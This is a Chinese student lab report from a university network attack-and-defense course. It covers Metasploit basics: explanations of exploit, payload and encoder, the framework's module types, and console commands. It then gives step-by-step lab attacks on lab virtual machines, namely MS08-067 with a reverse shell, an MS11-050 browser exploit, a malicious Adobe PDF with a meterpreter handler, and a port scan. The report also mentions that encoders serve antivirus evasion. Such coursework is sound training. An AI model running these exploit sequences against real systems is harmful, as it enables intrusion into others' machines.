标签:动态 选项 show gre iar 目标 查看 element 功能
用自己的话解释什么是exploit,payload,encode.
exploit是载具,连接漏洞,将payload传送到靶机中。
payload是载荷,是exploit中shellcode中的主要功能代码,exploit把它送到靶机中后,是真正负责进行攻击代码。
encode是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。
1.MSF攻击方法
2.MSF的六个模块
查看六种模块源码目录/usr/share/metasploit-framework/modules
渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去
辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提
攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
空字段模块Nop Modules
编码模块Encoders
后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行
3.MSF的三种用户操作界面
4.MSF常用漏洞利用命令
search name:用指定关键字搜索可以利用的漏洞模块
use exploit name:使用漏洞
show options:显示配置选项
set option name option:设置选项
show payloads:回链攻击载荷
show targets: 显示目标(os版本)
set TARGET target number:设置目标版本
exploit:开始漏洞攻击
sessions -l:列出会话
sessions -i id:选择会话
sessions -k id:结束会话
Ctrl+z:把会话放到后台
Ctrl+c:结束会话
show auxiliary:显示辅助模块
use auxiliary name :使用辅助模块
set option name option:设置选项
exploit:运行模块
1.主动攻击实例
ms08-067
测试靶机与攻击机之间能否ping通
查看到靶机漏洞、
search ms08-067查看漏洞位置
show payloads查看可用payload
set payload generic/shell_reverse_tcp反向连接
攻击结果
2.一个针对浏览器的攻击
ms11_50
use windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_http
set LHOST 192.168.253.132
set RHOST 192.168.253.130
set LPORT 5333
set URIPATH 5333
exploit
3.一个针对客户端的攻击
msfconsole
search adobe
use windows/fileformat/adobe_cooltype_sing
info //查看漏洞具体信息
set payload windows/meterpreter/reverse_tcp //选择攻击载荷
show options //查看详细信息
set LPORT 5333 //设置端口号
set RHOST 192.168.253.130 //设置靶机IP地址
exploit #攻击
将生成的msf.pdf复制到Windows XP中
kail中输入back退出当前模块,进入监听模块
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //选择攻击载荷
show options //查看详细信息
set RHOST 192.168.253.130 //设置靶机IP地址
set LPORT 5333 //设置端口号
exploit //攻击
在靶机中使用双击打开msf.pdf
4.成功应用任何一个辅助模块。
利用辅助模块查看端口是否开启
search portscan # 搜索端口
use auxiliary/scanner/portscan/tcp # 使用漏洞
show options #显示设置
set RHOSTS 192.168.253.130 # 设置监听者地址
exploit # 攻击
实验心得
本次实验操作起来简单,逻辑清晰,不同的靶机有不同的漏洞。攻击时对操作系统和软件版本都有很高的要求。必须要在特定环境和特定触发条件下才能成功。现在都是一些最基础的攻击手段,要是开着防火墙就什么也做不到。
# 2019-2020-2 网络对抗技术 20175333 曹雅坤 Exp6 MSF基础应用
标签:动态 选项 show gre iar 目标 查看 element 功能
原文地址:https://www.cnblogs.com/Hf-Hf/p/12820381.html